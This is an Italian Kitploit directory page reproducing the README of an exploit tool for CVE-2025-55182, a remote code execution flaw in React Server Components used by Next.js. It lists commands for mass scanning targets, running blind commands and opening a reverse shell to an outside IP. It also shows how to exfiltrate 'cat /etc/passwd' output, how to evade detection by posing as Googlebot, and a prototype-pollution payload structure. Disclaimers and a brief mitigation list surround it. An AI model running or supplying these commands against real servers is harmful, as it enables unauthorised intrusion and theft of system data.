Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 Tool di Exploit per l'Esecuzione Remota di Codice nei React Server Components | Kitploit
Strumenti/GitHubGitHub/spritualkb/cve-2025-55182-exp
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 Tool di Exploit per l'Esecuzione Remota di Codice nei React Server Components

461239 mesi faRevisionato da Kitploit
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182-exp

CVE Type Python License

🔥 Panoramica

CVE-2025-55182 è una vulnerabilità critica di Remote Code Execution (RCE) nei React Server Components (RSC) che colpisce le applicazioni Next.js che utilizzano App Router con Server Actions.

La vulnerabilità risiede nel processo di deserializzazione del protocollo Flight, consentendo agli attaccanti di ottenere l'esecuzione di codice arbitrario tramite prototype pollution.

⚠️ Disclaimer / Dichiarazione di non responsabilità

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Qualsiasi uso illegale o non autorizzato di questo strumento è di esclusiva responsabilità dell'utente. L'autore non si assume alcuna responsabilità.

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. In caso di violazioni o operazioni illegali, ogni conseguenza è a totale carico dell'utente; l'autore non è responsabile in alcun modo.

Si prega di leggere l'intero DISCLAIMER.md prima di utilizzare questo strumento.

Utilizzando questo strumento, accetti che:

  • Hai ottenuto la dovuta autorizzazione per qualsiasi test
  • Rispetterai tutte le leggi e le normative applicabili
  • Accetti la piena responsabilità delle tue azioni
  • L'autore non ha alcuna responsabilità per un uso improprio

📋 Versioni interessate

ComponentAffected Versions
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 Utilizzo

Verifica di un singolo target

root@kitploit:~
python3 exploit.py http://target:3000 --check

Scansione batch da file

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Esecuzione di un comando (RCE cieca)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

Reverse Shell

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Esfiltrazione dell'output di un comando

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Utilizzo di un proxy

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Modalità stealth

ModeDescription
browserSimula le richieste reali del browser (predefinita)
crawlerSimula i crawler dei motori di ricerca (Googlebot, Baiduspider, ecc.)
securityUtilizza User-Agents di scanner di sicurezza

🔧 Opzioni

OptionDescription
targetURL del target (ad es., http://localhost:3000)
-f, --fileFile contenente gli URL dei target (uno per riga)
-o, --outputFile di output per i target vulnerabili
-c, --commandComando da eseguire (cieco)
--checkVerifica la presenza della vulnerabilità
--proxyProxy SOCKS5 (ad es., socks5://127.0.0.1:1080)
--stealthModalità stealth: browser, crawler, security
--delayRitardo tra le richieste in secondi
--variantsUsa più varianti di payload per un controllo approfondito
--revshell IP PORTReverse shell verso IP:PORT
--exfil CMD IP PORTEsegue CMD e invia l'output a IP:PORT
-t, --timeoutTimeout della richiesta in secondi (predefinito: 15)

🔬 Dettagli tecnici

Meccanismo della vulnerabilità

Lo sfruttamento si basa sulla prototype pollution nella deserializzazione del protocollo Flight:

  1. Prototype Pollution: inquina Object.prototype.then tramite "$1:__proto__:then"
  2. Accesso al costruttore di Function: imposta _formData.get sul costruttore di Function tramite "$1:constructor:constructor"
  3. Iniezione di codice: inietta codice malevolo tramite _prefix che viene passato a Function()

Struttura del payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Struttura dei file

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 Formato di targets.txt

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Mitigazione

  1. Aggiorna alle ultime versioni patchate di react-server-dom-webpack e Next.js
  2. Implementa la validazione degli input sulle Server Actions
  3. Utilizza regole Web Application Firewall (WAF) per rilevare payload malevoli del protocollo Flight
  4. Monitora la presenza di errori anomali lato server (HTTP 500) con messaggi legati alla prototype pollution

📜 Licenza

Questo progetto è distribuito sotto la licenza MIT - vedere il file LICENSE per i dettagli.


⚠️ Disclaimer legale / Dichiarazione di non responsabilità legale

Inglese

Termini di utilizzo

Scaricando, copiando, installando o utilizzando questo software, accetti di essere vincolato dai termini della presente dichiarazione.

Scopo previsto

Questo strumento è progettato esclusivamente per:

  • Test di penetrazione autorizzati
  • Ricerca e formazione sulla sicurezza
  • Valutazione delle vulnerabilità con la dovuta autorizzazione
  • Competizioni CTF (Capture The Flag)
  • Ambienti di laboratorio personali

Uso proibito

Non DEVI utilizzare questo strumento per:

  • Accesso non autorizzato a sistemi informatici
  • Qualsiasi attività illegale
  • Attaccare sistemi senza esplicita autorizzazione scritta
  • Causare danni a sistemi o dati
  • Qualsiasi attività che violi leggi locali, statali, nazionali o internazionali

Nessuna garanzia

QUESTO SOFTWARE È FORNITO "COSÌ COM'È" SENZA ALCUN TIPO DI GARANZIA, ESPRESSA O IMPLICITA. GLI AUTORI DECLINANO OGNI GARANZIA, INCLUSO, A TITOLO ESEMPLIFICATIVO:

  • COMMERCIABILITÀ
  • IDONEITÀ A UNO SCOPO PARTICOLARE
  • NON VIOLAZIONE DI DIRITTI ALTRUI

Limitazione di responsabilità

IN NESSUN CASO GLI AUTORI SARANNO RITENUTI RESPONSABILI PER:

  • Danni diretti, indiretti, incidentali, speciali, esemplari o consequenziali
  • Perdita di dati, profitti o opportunità commerciali
  • Conseguenze legali derivanti dall'uso improprio di questo strumento

Responsabilità dell'utente

L'utente si assume piena responsabilità per:

  • L'ottenimento della dovuta autorizzazione prima di testare qualsiasi sistema
  • Il rispetto di tutte le leggi e le normative applicabili
  • Qualsiasi conseguenza derivante dall'uso di questo strumento
  • Garantire la legalità delle proprie azioni nella propria giurisdizione

Riconoscimento

Utilizzando questo strumento, riconosci che:

  1. Hai letto e compreso la presente dichiarazione
  2. Utilizzerai questo strumento solo per scopi legali e autorizzati
  3. Accetti tutti i rischi associati all'uso di questo strumento
  4. Gli autori non si assumono alcuna responsabilità per un uso improprio

Cinese

Termini di utilizzo

Scaricando, copiando, installando o utilizzando questo software, accetti di essere vincolato dai termini della presente dichiarazione di non responsabilità.

Scopo previsto

Questo strumento è destinato esclusivamente a:

  • Test di penetrazione autorizzati
  • Ricerca e formazione sulla sicurezza
  • Valutazione delle vulnerabilità con la dovuta autorizzazione
  • Competizioni CTF (Capture The Flag)
  • Ambienti di laboratorio personali

Uso proibito

Non devi utilizzare questo strumento per:

  • Accesso non autorizzato a sistemi informatici
  • Qualsiasi attività illegale
  • Attaccare sistemi senza esplicita autorizzazione scritta
  • Causare danni a sistemi o dati
  • Qualsiasi attività che violi leggi locali, statali, nazionali o internazionali

Dichiarazione di assenza di garanzia

Questo software è fornito "così com'è", senza alcuna garanzia esplicita o implicita. Gli autori declinano ogni garanzia, inclusa, a titolo esemplificativo:

  • Commerciabilità
  • Idoneità a uno scopo particolare
  • Non violazione di diritti altrui

Limitazione di responsabilità

In nessun caso gli autori saranno ritenuti responsabili per:

  • Danni diretti, indiretti, incidentali, speciali, punitivi o consequenziali
  • Perdita di dati, profitti o opportunità commerciali
  • Conseguenze legali derivanti dall'abuso di questo strumento

Responsabilità dell'utente

L'utente si assume piena responsabilità per:

  • Aver ottenuto la dovuta autorizzazione prima di testare qualsiasi sistema
  • Il rispetto di tutte le leggi e le normative applicabili
  • Qualsiasi conseguenza derivante dall'uso di questo strumento
  • Garantire la legalità delle proprie azioni nella propria giurisdizione

Dichiarazione di conferma

Utilizzando questo strumento, confermi che:

  1. Hai letto e compreso la presente dichiarazione di non responsabilità
  2. Utilizzerai questo strumento solo per scopi legali e autorizzati
  3. Accetti tutti i rischi associati all'uso di questo strumento
  4. Gli autori non si assumono alcuna responsabilità per qualsiasi uso improprio

Riferimenti legali / Riferimenti giuridici

Leggi pertinenti

  • Cina: Legge sulla sicurezza informatica della Repubblica Popolare Cinese, articoli 285 e 286 del Codice penale della Repubblica Popolare Cinese
  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • UE: Direttiva 2013/40/UE sugli attacchi contro i sistemi informativi
  • UK: Computer Misuse Act 1990

Requisiti di autorizzazione per i test

Prima di effettuare qualsiasi test di sicurezza, è necessario:

  1. Ottenere l'autorizzazione scritta del proprietario del sistema
  2. Definire chiaramente l'ambito e i limiti del test
  3. Rispettare tutte le leggi e le normative applicabili
  4. Documentare tutte le attività di test

Prima di condurre qualsiasi test di sicurezza, è necessario:

  1. Ottenere l'autorizzazione scritta dal proprietario del sistema
  2. Definire chiaramente l'ambito e i limiti del test
  3. Rispettare tutte le leggi e le normative applicabili
  4. Documentare tutte le attività di test

⚠️ L'accesso non autorizzato a sistemi informatici è un reato ⚠️
⚠️ L'accesso non autorizzato al computer è un reato penale ⚠️

Scarica lo strumento